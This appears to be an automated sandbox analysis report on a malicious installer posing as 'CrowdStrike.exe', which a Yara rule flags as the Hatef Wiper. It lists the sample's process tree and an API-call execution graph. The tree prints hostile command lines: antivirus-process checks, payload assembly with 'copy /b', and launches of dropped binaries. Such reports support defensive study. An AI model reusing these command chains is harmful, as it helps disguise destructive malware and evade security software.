                                                                      Start date:21/07/2024
                                                                      Path:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\CrowdStrike.exe"
                                                                      Imagebase:0x400000
                                                                      File size:6'338'272 bytes
                                                                      MD5 hash:755C0350038DAEFB29B888B6F8739E81
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:05:14:03
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:05:14:03
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:05:14:03
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:tasklist
                                                                      Imagebase:0x500000
                                                                      File size:79'360 bytes
                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:05:14:03
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                      Imagebase:0xdb0000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:05:14:04
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:tasklist
                                                                      Imagebase:0x500000
                                                                      File size:79'360 bytes
                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:05:14:04
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                                                      Imagebase:0xdb0000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:05:14:05
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /c md 564784
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:05:14:05
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr /V "locatedflatrendsoperating" Ukraine
                                                                      Imagebase:0xdb0000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:05:14:05
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\L
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:05:14:05
                                                                      Start date:21/07/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\564784\Champion.pif
                                                                      Wow64 process (32bit):true
                                                                      Commandline:564784\Champion.pif 564784\L
                                                                      Imagebase:0xde0000
                                                                      File size:893'608 bytes
                                                                      MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 7%, ReversingLabs
                                                                      • Detection: 3%, Virustotal, Browse
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:05:14:05
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:timeout 15
                                                                      Imagebase:0x870000
                                                                      File size:25'088 bytes
                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:15
                                                                      Start time:05:14:37
                                                                      Start date:21/07/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      Imagebase:0x280000
                                                                      File size:65'440 bytes
                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_HatefWiper, Description: Yara detected Hatef Wiper, Source: 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal, Browse
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:12.8%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:20.6%
                                                                        Total number of Nodes:1523
                                                                        Total number of Limit Nodes:37
                                                                        execution_graph 4165 402fc0 4166 401446 18 API calls 4165->4166 4167 402fc7 4166->4167 4168 403017 4167->4168 4169 40300a 4167->4169 4172 401a13 4167->4172 4170 406805 18 API calls 4168->4170 4171 401446 18 API calls 4169->4171 4170->4172 4171->4172 4173 4023c1 4174 40145c 18 API calls 4173->4174 4175 4023c8 4174->4175 4178 40726a 4175->4178 4181 406ed2 CreateFileW 4178->4181 4182 406f04 4181->4182 4183 406f1e ReadFile 4181->4183 4184 4062a3 11 API calls 4182->4184 4185 4023d6 4183->4185 4188 406f84 4183->4188 4184->4185 4186 4071e3 CloseHandle 4186->4185 4187 406f9b ReadFile lstrcpynA lstrcmpA 4187->4188 4189 406fe2 SetFilePointer ReadFile 4187->4189 4188->4185 4188->4186 4188->4187 4192 406fdd 4188->4192 4189->4186 4190 4070a8 ReadFile 4189->4190 4191 407138 4190->4191 4191->4190 4191->4192 4193 40715f SetFilePointer GlobalAlloc ReadFile 4191->4193 4192->4186 4194 4071a3 4193->4194 4195 4071bf lstrcpynW GlobalFree 4193->4195 4194->4194 4194->4195 4195->4186 4196 401cc3 4197 40145c 18 API calls 4196->4197 4198 401cca lstrlenW 4197->4198 4199 4030dc 4198->4199 4200 4030e3 4199->4200 4202 405f51 wsprintfW 4199->4202 4202->4200 4217 401c46 4218 40145c 18 API calls 4217->4218 4219 401c4c 4218->4219 4220 4062a3 11 API calls 4219->4220 4221 401c59 4220->4221 4222 406c9b 81 API calls 4221->4222 4223 401c64 4222->4223 4224 403049 4225 401446 18 API calls 4224->4225 4228 403050 4225->4228 4226 406805 18 API calls 4227 401a13 4226->4227 4228->4226 4228->4227 4229 40204a 4230 401446 18 API calls 4229->4230 4231 402051 IsWindow 4230->4231 4232 4018d3 4231->4232 4233 40324c 4234 403277 4233->4234 4235 40325e SetTimer 4233->4235 4236 4032cc 4234->4236 4237 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4234->4237 4235->4234 4237->4236 4238 4048cc 4239 4048f1 4238->4239 4240 4048da 4238->4240 4242 4048ff IsWindowVisible 4239->4242 4246 404916 4239->4246 4241 4048e0 4240->4241 4256 40495a 4240->4256 4243 403daf SendMessageW 4241->4243 4245 40490c 4242->4245 4242->4256 4247 4048ea 4243->4247 4244 404960 CallWindowProcW 4244->4247 4257 40484e SendMessageW 4245->4257 4246->4244 4262 406009 lstrcpynW 4246->4262 4250 404945 4263 405f51 wsprintfW 4250->4263 4252 40494c 4253 40141d 80 API calls 4252->4253 4254 404953 4253->4254 4264 406009 lstrcpynW 4254->4264 4256->4244 4258 404871 GetMessagePos ScreenToClient SendMessageW 4257->4258 4259 4048ab SendMessageW 4257->4259 4260 4048a3 4258->4260 4261 4048a8 4258->4261 4259->4260 4260->4246 4261->4259 4262->4250 4263->4252 4264->4256 4265 4022cc 4266 40145c 18 API calls 4265->4266 4267 4022d3 4266->4267 4268 4062d5 2 API calls 4267->4268 4269 4022d9 4268->4269 4270 4022e8 4269->4270 4274 405f51 wsprintfW 4269->4274 4273 4030e3 4270->4273 4275 405f51 wsprintfW 4270->4275 4274->4270 4275->4273 4276 4050cd 4277 405295 4276->4277 4278 4050ee GetDlgItem GetDlgItem GetDlgItem 4276->4278 4279 4052c6 4277->4279 4280 40529e GetDlgItem CreateThread CloseHandle 4277->4280 4325 403d98 SendMessageW 4278->4325 4282 4052f4 4279->4282 4284 4052e0 ShowWindow ShowWindow 4279->4284 4285 405316 4279->4285 4280->4279 4286 405352 4282->4286 4288 405305 4282->4288 4289 40532b ShowWindow 4282->4289 4283 405162 4296 406805 18 API calls 4283->4296 4330 403d98 SendMessageW 4284->4330 4334 403dca 4285->4334 4286->4285 4291 40535d SendMessageW 4286->4291 4331 403d18 4288->4331 4294 40534b 4289->4294 4295 40533d 4289->4295 4293 40528e 4291->4293 4298 405376 CreatePopupMenu 4291->4298 4297 403d18 SendMessageW 4294->4297 4299 404f72 25 API calls 4295->4299 4300 405181 4296->4300 4297->4286 4301 406805 18 API calls 4298->4301 4299->4294 4302 4062a3 11 API calls 4300->4302 4304 405386 AppendMenuW 4301->4304 4303 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4302->4303 4305 4051f3 4303->4305 4306 4051d7 SendMessageW SendMessageW 4303->4306 4307 405399 GetWindowRect 4304->4307 4308 4053ac 4304->4308 4309 405206 4305->4309 4310 4051f8 SendMessageW 4305->4310 4306->4305 4311 4053b3 TrackPopupMenu 4307->4311 4308->4311 4326 403d3f 4309->4326 4310->4309 4311->4293 4313 4053d1 4311->4313 4315 4053ed SendMessageW 4313->4315 4314 405216 4316 405253 GetDlgItem SendMessageW 4314->4316 4317 40521f ShowWindow 4314->4317 4315->4315 4318 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4315->4318 4316->4293 4321 405276 SendMessageW SendMessageW 4316->4321 4319 405242 4317->4319 4320 405235 ShowWindow 4317->4320 4322 40542f SendMessageW 4318->4322 4329 403d98 SendMessageW 4319->4329 4320->4319 4321->4293 4322->4322 4323 40545a GlobalUnlock SetClipboardData CloseClipboard 4322->4323 4323->4293 4325->4283 4327 406805 18 API calls 4326->4327 4328 403d4a SetDlgItemTextW 4327->4328 4328->4314 4329->4316 4330->4282 4332 403d25 SendMessageW 4331->4332 4333 403d1f 4331->4333 4332->4285 4333->4332 4335 403ddf GetWindowLongW 4334->4335 4345 403e68 4334->4345 4336 403df0 4335->4336 4335->4345 4337 403e02 4336->4337 4338 403dff GetSysColor 4336->4338 4339 403e12 SetBkMode 4337->4339 4340 403e08 SetTextColor 4337->4340 4338->4337 4341 403e30 4339->4341 4342 403e2a GetSysColor 4339->4342 4340->4339 4343 403e41 4341->4343 4344 403e37 SetBkColor 4341->4344 4342->4341 4343->4345 4346 403e54 DeleteObject 4343->4346 4347 403e5b CreateBrushIndirect 4343->4347 4344->4343 4345->4293 4346->4347 4347->4345 4348 4030cf 4349 40145c 18 API calls 4348->4349 4350 4030d6 4349->4350 4352 4030dc 4350->4352 4355 4063ac GlobalAlloc lstrlenW 4350->4355 4353 4030e3 4352->4353 4382 405f51 wsprintfW 4352->4382 4356 4063e2 4355->4356 4357 406434 4355->4357 4358 40640f GetVersionExW 4356->4358 4383 40602b CharUpperW 4356->4383 4357->4352 4358->4357 4359 40643e 4358->4359 4360 406464 LoadLibraryA 4359->4360 4361 40644d 4359->4361 4360->4357 4364 406482 GetProcAddress GetProcAddress GetProcAddress 4360->4364 4361->4357 4363 406585 GlobalFree 4361->4363 4365 40659b LoadLibraryA 4363->4365 4366 4066dd FreeLibrary 4363->4366 4369 4064aa 4364->4369 4372 4065f5 4364->4372 4365->4357 4368 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4365->4368 4366->4357 4367 406651 FreeLibrary 4376 40662a 4367->4376 4368->4372 4370 4064ce FreeLibrary GlobalFree 4369->4370 4369->4372 4378 4064ea 4369->4378 4370->4357 4371 4066ea 4374 4066ef CloseHandle FreeLibrary 4371->4374 4372->4367 4372->4376 4373 4064fc lstrcpyW OpenProcess 4375 40654f CloseHandle CharUpperW lstrcmpW 4373->4375 4373->4378 4377 406704 CloseHandle 4374->4377 4375->4372 4375->4378 4376->4371 4379 406685 lstrcmpW 4376->4379 4380 4066b6 CloseHandle 4376->4380 4381 4066d4 CloseHandle 4376->4381 4377->4374 4378->4363 4378->4373 4378->4375 4379->4376 4379->4377 4380->4376 4381->4366 4382->4353 4383->4356 4384 407752 4388 407344 4384->4388 4385 407c6d 4386 4073c2 GlobalFree 4387 4073cb GlobalAlloc 4386->4387 4387->4385 4387->4388 4388->4385 4388->4386 4388->4387 4388->4388 4389 407443 GlobalAlloc 4388->4389 4390 40743a GlobalFree 4388->4390 4389->4385 4389->4388 4390->4389 4391 401dd3 4392 401446 18 API calls 4391->4392 4393 401dda 4392->4393 4394 401446 18 API calls 4393->4394 4395 4018d3 4394->4395 4403 402e55 4404 40145c 18 API calls 4403->4404 4405 402e63 4404->4405 4406 402e79 4405->4406 4407 40145c 18 API calls 4405->4407 4408 405e30 2 API calls 4406->4408 4407->4406 4409 402e7f 4408->4409 4433 405e50 GetFileAttributesW CreateFileW 4409->4433 4411 402e8c 4412 402f35 4411->4412 4413 402e98 GlobalAlloc 4411->4413 4416 4062a3 11 API calls 4412->4416 4414 402eb1 4413->4414 4415 402f2c CloseHandle 4413->4415 4434 403368 SetFilePointer 4414->4434 4415->4412 4418 402f45 4416->4418 4420 402f50 DeleteFileW 4418->4420 4421 402f63 4418->4421 4419 402eb7 4423 403336 ReadFile 4419->4423 4420->4421 4435 401435 4421->4435 4424 402ec0 GlobalAlloc 4423->4424 4425 402ed0 4424->4425 4426 402f04 WriteFile GlobalFree 4424->4426 4427 40337f 37 API calls 4425->4427 4428 40337f 37 API calls 4426->4428 4432 402edd 4427->4432 4429 402f29 4428->4429 4429->4415 4431 402efb GlobalFree 4431->4426 4432->4431 4433->4411 4434->4419 4436 404f72 25 API calls 4435->4436 4437 401443 4436->4437 4438 401cd5 4439 401446 18 API calls 4438->4439 4440 401cdd 4439->4440 4441 401446 18 API calls 4440->4441 4442 401ce8 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401cf1 4443->4444 4445 401d07 lstrlenW 4444->4445 4446 401d43 4444->4446 4447 401d11 4445->4447 4447->4446 4451 406009 lstrcpynW 4447->4451 4449 401d2c 4449->4446 4450 401d39 lstrlenW 4449->4450 4450->4446 4451->4449 4452 403cd6 4453 403ce1 4452->4453 4454 403ce5 4453->4454 4455 403ce8 GlobalAlloc 4453->4455 4455->4454 4456 402cd7 4457 401446 18 API calls 4456->4457 4460 402c64 4457->4460 4458 402d99 4459 402d17 ReadFile 4459->4460 4460->4456 4460->4458 4460->4459 4461 402dd8 4462 402ddf 4461->4462 4463 4030e3 4461->4463 4464 402de5 FindClose 4462->4464 4464->4463 4465 401d5c 4466 40145c 18 API calls 4465->4466 4467 401d63 4466->4467 4468 40145c 18 API calls 4467->4468 4469 401d6c 4468->4469 4470 401d73 lstrcmpiW 4469->4470 4471 401d86 lstrcmpW 4469->4471 4472 401d79 4470->4472 4471->4472 4473 401c99 4471->4473 4472->4471 4472->4473 4103 407c5f 4104 407344 4103->4104 4105 4073c2 GlobalFree 4104->4105 4106 4073cb GlobalAlloc 4104->4106 4107 407c6d 4104->4107 4108 407443 GlobalAlloc 4104->4108 4109 40743a GlobalFree 4104->4109 4105->4106 4106->4104 4106->4107 4108->4104 4108->4107 4109->4108 4474 404363 4475 404373 4474->4475 4476 40439c 4474->4476 4478 403d3f 19 API calls 4475->4478 4477 403dca 8 API calls 4476->4477 4479 4043a8 4477->4479 4480 404380 SetDlgItemTextW 4478->4480 4480->4476 4481 4027e3 4482 4027e9 4481->4482 4483 4027f2 4482->4483 4484 402836 4482->4484 4497 401553 4483->4497 4485 40145c 18 API calls 4484->4485 4487 40283d 4485->4487 4489 4062a3 11 API calls 4487->4489 4488 4027f9 4490 40145c 18 API calls 4488->4490 4495 401a13 4488->4495 4491 40284d 4489->4491 4492 40280a RegDeleteValueW 4490->4492 4501 40149d RegOpenKeyExW 4491->4501 4493 4062a3 11 API calls 4492->4493 4496 40282a RegCloseKey 4493->4496 4496->4495 4498 401563 4497->4498 4499 40145c 18 API calls 4498->4499 4500 401589 RegOpenKeyExW 4499->4500 4500->4488 4507 401515 4501->4507 4509 4014c9 4501->4509 4502 4014ef RegEnumKeyW 4503 401501 RegCloseKey 4502->4503 4502->4509 4504 4062fc 3 API calls 4503->4504 4506 401511 4504->4506 4505 401526 RegCloseKey 4505->4507 4506->4507 4510 401541 RegDeleteKeyW 4506->4510 4507->4495 4508 40149d 3 API calls 4508->4509 4509->4502 4509->4503 4509->4505 4509->4508 4510->4507 4511 403f64 4512 403f90 4511->4512 4513 403f74 4511->4513 4515 403fc3 4512->4515 4516 403f96 SHGetPathFromIDListW 4512->4516 4522 405c84 GetDlgItemTextW 4513->4522 4518 403fad SendMessageW 4516->4518 4519 403fa6 4516->4519 4517 403f81 SendMessageW 4517->4512 4518->4515 4520 40141d 80 API calls 4519->4520 4520->4518 4522->4517 4523 402ae4 4524 402aeb 4523->4524 4525 4030e3 4523->4525 4526 402af2 CloseHandle 4524->4526 4526->4525 4527 402065 4528 401446 18 API calls 4527->4528 4529 40206d 4528->4529 4530 401446 18 API calls 4529->4530 4531 402076 GetDlgItem 4530->4531 4532 4030dc 4531->4532 4533 4030e3 4532->4533 4535 405f51 wsprintfW 4532->4535 4535->4533 4536 402665 4537 40145c 18 API calls 4536->4537 4538 40266b 4537->4538 4539 40145c 18 API calls 4538->4539 4540 402674 4539->4540 4541 40145c 18 API calls 4540->4541 4542 40267d 4541->4542 4543 4062a3 11 API calls 4542->4543 4544 40268c 4543->4544 4545 4062d5 2 API calls 4544->4545 4546 402695 4545->4546 4547 4026a6 lstrlenW lstrlenW 4546->4547 4548 404f72 25 API calls 4546->4548 4551 4030e3 4546->4551 4549 404f72 25 API calls 4547->4549 4548->4546 4550 4026e8 SHFileOperationW 4549->4550 4550->4546 4550->4551 4559 401c69 4560 40145c 18 API calls 4559->4560 4561 401c70 4560->4561 4562 4062a3 11 API calls 4561->4562 4563 401c80 4562->4563 4564 405ca0 MessageBoxIndirectW 4563->4564 4565 401a13 4564->4565 4573 402f6e 4574 402f72 4573->4574 4575 402fae 4573->4575 4576 4062a3 11 API calls 4574->4576 4577 40145c 18 API calls 4575->4577 4578 402f7d 4576->4578 4583 402f9d 4577->4583 4579 4062a3 11 API calls 4578->4579 4580 402f90 4579->4580 4581 402fa2 4580->4581 4582 402f98 4580->4582 4585 4060e7 9 API calls 4581->4585 4584 403e74 5 API calls 4582->4584 4584->4583 4585->4583 4586 4023f0 4587 402403 4586->4587 4588 4024da 4586->4588 4589 40145c 18 API calls 4587->4589 4590 404f72 25 API calls 4588->4590 4591 40240a 4589->4591 4596 4024f1 4590->4596 4592 40145c 18 API calls 4591->4592 4593 402413 4592->4593 4594 402429 LoadLibraryExW 4593->4594 4595 40241b GetModuleHandleW 4593->4595 4597 40243e 4594->4597 4598 4024ce 4594->4598 4595->4594 4595->4597 4610 406365 GlobalAlloc WideCharToMultiByte 4597->4610 4599 404f72 25 API calls 4598->4599 4599->4588 4601 402449 4602 40248c 4601->4602 4603 40244f 4601->4603 4604 404f72 25 API calls 4602->4604 4606 401435 25 API calls 4603->4606 4608 40245f 4603->4608 4605 402496 4604->4605 4607 4062a3 11 API calls 4605->4607 4606->4608 4607->4608 4608->4596 4609 4024c0 FreeLibrary 4608->4609 4609->4596 4611 406390 GetProcAddress 4610->4611 4612 40639d GlobalFree 4610->4612 4611->4612 4612->4601 4613 402df3 4614 402dfa 4613->4614 4616 4019ec 4613->4616 4615 402e07 FindNextFileW 4614->4615 4615->4616 4617 402e16 4615->4617 4619 406009 lstrcpynW 4617->4619 4619->4616 4620 402175 4621 401446 18 API calls 4620->4621 4622 40217c 4621->4622 4623 401446 18 API calls 4622->4623 4624 402186 4623->4624 4625 4062a3 11 API calls 4624->4625 4629 402197 4624->4629 4625->4629 4626 4021aa EnableWindow 4628 4030e3 4626->4628 4627 40219f ShowWindow 4627->4628 4629->4626 4629->4627 4637 404077 4638 404081 4637->4638 4639 404084 lstrcpynW lstrlenW 4637->4639 4638->4639 4640 405479 4641 405491 4640->4641 4642 4055cd 4640->4642 4641->4642 4643 40549d 4641->4643 4644 40561e 4642->4644 4645 4055de GetDlgItem GetDlgItem 4642->4645 4646 4054a8 SetWindowPos 4643->4646 4647 4054bb 4643->4647 4649 405678 4644->4649 4657 40139d 80 API calls 4644->4657 4648 403d3f 19 API calls 4645->4648 4646->4647 4651 4054c0 ShowWindow 4647->4651 4652 4054d8 4647->4652 4653 405608 SetClassLongW 4648->4653 4650 403daf SendMessageW 4649->4650 4670 4055c8 4649->4670 4679 40568a 4650->4679 4651->4652 4654 4054e0 DestroyWindow 4652->4654 4655 4054fa 4652->4655 4656 40141d 80 API calls 4653->4656 4707 4058dc 4654->4707 4658 405510 4655->4658 4659 4054ff SetWindowLongW 4655->4659 4656->4644 4660 405650 4657->4660 4663 405587 4658->4663 4664 40551c GetDlgItem 4658->4664 4659->4670 4660->4649 4665 405654 SendMessageW 4660->4665 4661 40141d 80 API calls 4661->4679 4662 4058de DestroyWindow EndDialog 4662->4707 4666 403dca 8 API calls 4663->4666 4668 40554c 4664->4668 4669 40552f SendMessageW IsWindowEnabled 4664->4669 4665->4670 4666->4670 4667 40590d ShowWindow 4667->4670 4672 405559 4668->4672 4673 4055a0 SendMessageW 4668->4673 4674 40556c 4668->4674 4682 405551 4668->4682 4669->4668 4669->4670 4671 406805 18 API calls 4671->4679 4672->4673 4672->4682 4673->4663 4677 405574 4674->4677 4678 405589 4674->4678 4675 403d18 SendMessageW 4675->4663 4676 403d3f 19 API calls 4676->4679 4680 40141d 80 API calls 4677->4680 4681 40141d 80 API calls 4678->4681 4679->4661 4679->4662 4679->4670 4679->4671 4679->4676 4683 403d3f 19 API calls 4679->4683 4698 40581e DestroyWindow 4679->4698 4680->4682 4681->4682 4682->4663 4682->4675 4684 405705 GetDlgItem 4683->4684 4685 405723 ShowWindow EnableWindow 4684->4685 4686 40571a 4684->4686 4708 403d85 EnableWindow 4685->4708 4686->4685 4688 40574d EnableWindow 4691 405761 4688->4691 4689 405766 GetSystemMenu EnableMenuItem SendMessageW 4690 405796 SendMessageW 4689->4690 4689->4691 4690->4691 4691->4689 4709 403d98 SendMessageW 4691->4709 4710 406009 lstrcpynW 4691->4710 4694 4057c4 lstrlenW 4695 406805 18 API calls 4694->4695 4696 4057da SetWindowTextW 4695->4696 4697 40139d 80 API calls 4696->4697 4697->4679 4699 405838 CreateDialogParamW 4698->4699 4698->4707 4700 40586b 4699->4700 4699->4707 4701 403d3f 19 API calls 4700->4701 4702 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4701->4702 4703 40139d 80 API calls 4702->4703 4704 4058bc 4703->4704 4704->4670 4705 4058c4 ShowWindow 4704->4705 4706 403daf SendMessageW 4705->4706 4706->4707 4707->4667 4707->4670 4708->4688 4709->4691 4710->4694 4711 4020f9 GetDC GetDeviceCaps 4712 401446 18 API calls 4711->4712 4713 402116 MulDiv 4712->4713 4714 401446 18 API calls 4713->4714 4715 40212c 4714->4715 4716 406805 18 API calls 4715->4716 4717 402165 CreateFontIndirectW 4716->4717 4718 4030dc 4717->4718 4719 4030e3 4718->4719 4721 405f51 wsprintfW 4718->4721 4721->4719 4722 4024fb 4723 40145c 18 API calls 4722->4723 4724 402502 4723->4724 4725 40145c 18 API calls 4724->4725 4726 40250c 4725->4726 4727 40145c 18 API calls 4726->4727 4728 402515 4727->4728 4729 40145c 18 API calls 4728->4729 4730 40251f 4729->4730 4731 40145c 18 API calls 4730->4731 4732 402529 4731->4732 4733 40253d 4732->4733 4734 40145c 18 API calls 4732->4734 4735 4062a3 11 API calls 4733->4735 4734->4733 4736 40256a CoCreateInstance 4735->4736 4737 40258c 4736->4737 4738 40497c GetDlgItem GetDlgItem 4739 4049d2 7 API calls 4738->4739 4744 404bea 4738->4744 4740 404a76 DeleteObject 4739->4740 4741 404a6a SendMessageW 4739->4741 4742 404a81 4740->4742 4741->4740 4745 404ab8 4742->4745 4747 406805 18 API calls 4742->4747 4743 404ccf 4746 404d74 4743->4746 4751 404bdd 4743->4751 4756 404d1e SendMessageW 4743->4756 4744->4743 4754 40484e 5 API calls 4744->4754 4767 404c5a 4744->4767 4750 403d3f 19 API calls 4745->4750 4748 404d89 4746->4748 4749 404d7d SendMessageW 4746->4749 4753 404a9a SendMessageW SendMessageW 4747->4753 4758 404da2 4748->4758 4759 404d9b ImageList_Destroy 4748->4759 4769 404db2 4748->4769 4749->4748 4755 404acc 4750->4755 4757 403dca 8 API calls 4751->4757 4752 404cc1 SendMessageW 4752->4743 4753->4742 4754->4767 4760 403d3f 19 API calls 4755->4760 4756->4751 4762 404d33 SendMessageW 4756->4762 4763 404f6b 4757->4763 4764 404dab GlobalFree 4758->4764 4758->4769 4759->4758 4765 404add 4760->4765 4761 404f1c 4761->4751 4770 404f31 ShowWindow GetDlgItem ShowWindow 4761->4770 4766 404d46 4762->4766 4764->4769 4768 404baa GetWindowLongW SetWindowLongW 4765->4768 4777 404ba4 4765->4777 4780 404b39 SendMessageW 4765->4780 4781 404b67 SendMessageW 4765->4781 4782 404b7b SendMessageW 4765->4782 4776 404d57 SendMessageW 4766->4776 4767->4743 4767->4752 4771 404bc4 4768->4771 4769->4761 4772 404de4 4769->4772 4775 40141d 80 API calls 4769->4775 4770->4751 4773 404be2 4771->4773 4774 404bca ShowWindow 4771->4774 4785 404e12 SendMessageW 4772->4785 4788 404e28 4772->4788 4790 403d98 SendMessageW 4773->4790 4789 403d98 SendMessageW 4774->4789 4775->4772 4776->4746 4777->4768 4777->4771 4780->4765 4781->4765 4782->4765 4783 404ef3 InvalidateRect 4783->4761 4784 404f09 4783->4784 4791 4043ad 4784->4791 4785->4788 4787 404ea1 SendMessageW SendMessageW 4787->4788 4788->4783 4788->4787 4789->4751 4790->4744 4792 4043cd 4791->4792 4793 406805 18 API calls 4792->4793 4794 40440d 4793->4794 4795 406805 18 API calls 4794->4795 4796 404418 4795->4796 4797 406805 18 API calls 4796->4797 4798 404428 lstrlenW wsprintfW SetDlgItemTextW 4797->4798 4798->4761 4799 4026fc 4800 401ee4 4799->4800 4802 402708 4799->4802 4800->4799 4801 406805 18 API calls 4800->4801 4801->4800 4803 4019fd 4804 40145c 18 API calls 4803->4804 4805 401a04 4804->4805 4806 405e7f 2 API calls 4805->4806 4807 401a0b 4806->4807 4808 4022fd 4809 40145c 18 API calls 4808->4809 4810 402304 GetFileVersionInfoSizeW 4809->4810 4811 40232b GlobalAlloc 4810->4811 4815 4030e3 4810->4815 4812 40233f GetFileVersionInfoW 4811->4812 4811->4815 4813 402350 VerQueryValueW 4812->4813 4814 402381 